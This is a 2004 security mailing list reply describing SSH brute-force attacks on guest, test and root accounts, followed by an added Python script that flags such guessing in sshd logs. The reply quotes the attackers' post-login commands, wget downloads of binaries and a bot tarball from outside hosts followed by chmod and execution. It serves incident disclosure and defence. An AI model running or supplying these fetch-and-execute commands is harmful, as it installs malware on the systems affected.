Security Incidents mailing list archives
Re: SSH attacks?
From: Chris Brenton <cbrenton () chrisbrenton org>
Date: Tue, 27 Jul 2004 23:43:50 -0400
On Tue, 2004-07-27 at 14:00, Tobias Rice wrote:
| Does anyone know why this would appear all of a sudden? I'm getting *lots* of these, too. I just assumed it was a new sk tool since the first time I had this in IDS I tracked it to a compromised redhat box in Italy. One variant also tried root.
This has been discussed over the last few weeks on the DShield mailing list. The highlights:

Accounts checked are guest, test & root
It's simple brute force guessing (mostly blank password attempts)
Sources are usually old, unpatched, default install Linux boxes
Commands run once they get in:

wget yahaa.at/p/prt
wget yahaa.at/p/90
chmod +x 90
./90
chod +x prt
./prt
wget yahaa.at/p/brk
chmod +x brk
./brk
wget undernet.at/0
chmod +x 0
./0
wget dilimake.com/doremap
chmod +x doremap
./doremap
wget slap.go.ro/bot.tar.gz
tar -xzvf bot.tar.gz
cd bot

and it goes on from there.

Pretty much an amateur that sometimes gets lucky. No worries if you have a good password policy.

Chris
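Added example, not part of the original post or thread: a log check for the pattern described above, flagging sources that guess several of the guest/test/root accounts and sources that log in as one of them after failed guesses. The sshd message format, the function name analyze and the sample log lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Accounts named in the post as the ones being guessed.
WATCHED = {"guest", "test", "root"}

# OpenSSH syslog format for password auth results (assumed; older releases
# log "illegal user" where newer ones log "invalid user").
LINE_RE = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?:(?:invalid|illegal) user )?(?P<user>\S+) from (?P<src>\S+) port \d+"
)

# Constructed sample log lines (documentation address ranges), not real data.
SAMPLE_LOG = """\
Jul 27 14:00:01 host sshd[1001]: Failed password for illegal user guest from 192.0.2.10 port 40001 ssh2
Jul 27 14:00:03 host sshd[1002]: Failed password for illegal user test from 192.0.2.10 port 40002 ssh2
Jul 27 14:00:05 host sshd[1003]: Failed password for root from 192.0.2.10 port 40003 ssh2
Jul 27 14:05:11 host sshd[1010]: Failed password for alice from 198.51.100.7 port 51000 ssh2
Jul 27 14:05:20 host sshd[1011]: Accepted password for alice from 198.51.100.7 port 51001 ssh2
Jul 27 15:10:00 host sshd[1020]: Failed password for illegal user guest from 203.0.113.44 port 33000 ssh2
Jul 27 15:10:02 host sshd[1021]: Accepted password for test from 203.0.113.44 port 33001 ssh2
"""

def analyze(log_text, min_accounts=2):
    """Return {src: stats} for sources that guessed at least min_accounts of
    the watched accounts, or logged in as one after failing on one."""
    stats = defaultdict(lambda: {"accounts": set(), "failures": 0, "accepted": []})
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m or m["user"] not in WATCHED:
            continue
        entry = stats[m["src"]]
        if m["result"] == "Failed":
            entry["accounts"].add(m["user"])
            entry["failures"] += 1
        elif entry["failures"]:  # success after earlier failed guesses
            entry["accepted"].append(m["user"])
    return {src: e for src, e in stats.items()
            if len(e["accounts"]) >= min_accounts or e["accepted"]}

if __name__ == "__main__":
    for src, e in sorted(analyze(SAMPLE_LOG).items()):
        state = "login succeeded as " + ",".join(e["accepted"]) if e["accepted"] else "guessing only"
        print(f"{src}: {e['failures']} failures on {sorted(e['accounts'])}, {state}")
```

A source reported with a successful login is the case to investigate first, since the commands listed in the post run only after a guess works.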